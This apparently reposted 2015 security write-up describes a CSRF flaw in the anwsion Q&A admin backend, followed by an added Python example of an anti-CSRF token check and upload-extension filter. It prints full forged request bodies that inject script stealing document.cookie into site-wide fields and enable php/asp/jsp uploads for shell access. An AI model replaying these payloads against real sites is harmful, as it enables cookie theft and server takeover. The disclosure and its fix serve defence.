
A settings flaw in the anwsion admin backend, and its fix - Website Security - 自学PHP网

Source: 自学PHP网    Time: 2015-04-17 11:59


The program's admin settings requests carry no hash (anti-CSRF token) to restrict who can submit them, so a cross-site request can trigger the harms shown below.

http://127.0.0.1:8080/wenda/?/admin/setting/sys_save_ajax/

site_announce=<script>alert(document.cookie)</script>&url_rewrite_enable=N&request_route=1&request_route_custom=%2Fhome%2Fexplore%2F%3D%3D%3D%2Fexplore%2F%0A%2Fhome%2Fexplore%2Fguest%3D%3D%3D%2Fguest%0A%2Fhome%2Fexplore%2Fcategory-(%3Anum)%3D%3D%3D%2Fcategory%2F(%3Anum)%0A%2Fpeople%2Flist%2F%3D%3D%3D%2Fusers%2F%0A%2Faccount%2Flogin%2F%3D%3D%3D%2Flogin%2F%0A%2Faccount%2Flogout%2F%3D%3D%3D%2Flogout%2F%0A%2Faccount%2Fsetting%2F(%3Aany)%2F%3D%3D%3D%2Fsetting%2F(%3Aany)%2F&online_count_open=Y&online_interval=15&unread_flush_interval=100&auto_question_lock_day=30&statistic_code=%3Cscript%3Ealert(1)%3C%2Fscript%3E&report_reason=%E5%B9%BF%E5%91%8A%2FSPAM%0A%E6%81%B6%E6%84%8F%E7%81%8C%E6%B0%B4%0A%E8%BF%9D%E8%A7%84%E5%86%85%E5%AE%B9%0A%E6%96%87%E4%B8%8D%E5%AF%B9%E9%A2%98%0A%E9%87%8D%E5%A4%8D%E5%8F%91%E9%97%AE&report_message_uid=1&time_style=Y&admin_login_seccode=Y&_post_type=ajax
 
The site_announce parameter corresponds to: Site features -> Site announcement (HTML supported)

The statistic_code parameter corresponds to: Site features -> Site statistics code

The other parameters can be left at their defaults.

http://127.0.0.1:8080/wenda/?/admin/setting/type-content
 
The content settings page lets you set the allowed upload file extensions, which is even more dangerous!!!

quick_publish=Y&upload_enable=Y&allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp&upload_size_limit=512&answer_length_lower=2&question_title_limit=100&comment_limit=0&topic_title_limit=12&upload_avatar_size_limit=512&answer_edit_time=30&uninterested_fold=5&best_answer_day=30&best_answer_min_count=3&best_agree_min_count=3&related_question_keyword_count=&_post_type=ajax
 
 
allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp ... you get the idea.
 
 
 
The home page is hit by the XSS, affecting every user.

A user can get a shell directly.
 
Fix:

Add a hash (an anti-CSRF token) to the admin settings requests.
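As an added example (not code from anwsion or from this post), the following Python sketch shows what "add a hash" means in practice for a settings-save handler like the sys_save_ajax / type-content ones above: a per-session token that a third-party page cannot read, a constant-time check on every state-changing admin request, and, as defense in depth against the allowed_upload_types trick, an allow-list filter that refuses executable extensions even when the submitted value contains them. The request field name hash, the EXECUTABLE_EXTENSIONS set and the request bodies in demo() are my own assumptions and constructed data; anwsion itself is PHP and names its fields differently.

```python
import hmac
import secrets
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Extensions that a web server would execute rather than serve back (assumed set,
# covering the php/asp/aspx/jsp values that appeared in the original request).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php5", "phtml", "asp", "aspx", "jsp", "jspx"}


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) the per-session anti-CSRF hash and return it.

    The token lives server-side in the session and is embedded in the admin
    pages; an attacker's page cannot read it, so a forged cross-site POST
    cannot include the right value.
    """
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def csrf_token_valid(session: dict, submitted: Optional[str]) -> bool:
    """Compare in constant time so the token cannot be guessed byte by byte."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def sanitize_upload_types(value: str) -> List[str]:
    """Normalise the comma-separated extension list and drop executable ones."""
    kept: List[str] = []
    for ext in value.split(","):
        ext = ext.strip().lower().lstrip(".")
        if ext and ext not in EXECUTABLE_EXTENSIONS and ext not in kept:
            kept.append(ext)
    return kept


def save_settings(session: dict, raw_body: str) -> Tuple[bool, dict]:
    """Hardened model of an admin 'save settings' ajax handler.

    Returns (accepted, result). The request is rejected outright when the
    anti-CSRF hash is missing or wrong; otherwise the upload extension
    allow-list is filtered before the settings are stored.
    """
    fields = {k: v[0] for k, v in parse_qs(raw_body, keep_blank_values=True).items()}
    if not csrf_token_valid(session, fields.get("hash")):  # 'hash' field name is assumed
        return False, {"error": "missing or invalid anti-CSRF hash"}
    settings = {}
    for key, value in fields.items():
        if key in ("hash", "_post_type"):
            continue
        if key == "allowed_upload_types":
            value = ",".join(sanitize_upload_types(value))
        settings[key] = value
    return True, settings


def demo() -> dict:
    """Constructed walkthrough: a forged request without the hash is refused,
    the same request with the session's hash is accepted with php/jsp stripped."""
    session: dict = {}
    token = issue_csrf_token(session)
    # Constructed body modelled on the type-content request in the post.
    forged = (
        "quick_publish=Y&upload_enable=Y&allowed_upload_types=jpg%2Cpng%2Cphp%2Cjsp"
        "&upload_size_limit=512&_post_type=ajax"
    )
    forged_ok, _ = save_settings(session, forged)
    legit_ok, stored = save_settings(session, forged + "&hash=" + token)
    return {"forged_accepted": forged_ok, "legit_accepted": legit_ok, "stored": stored}


if __name__ == "__main__":
    print(demo())
```

The token check alone closes the CSRF hole described in the post; the extension filter is there so that even an authenticated, non-forged admin request cannot turn the upload feature into a shell drop.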
 
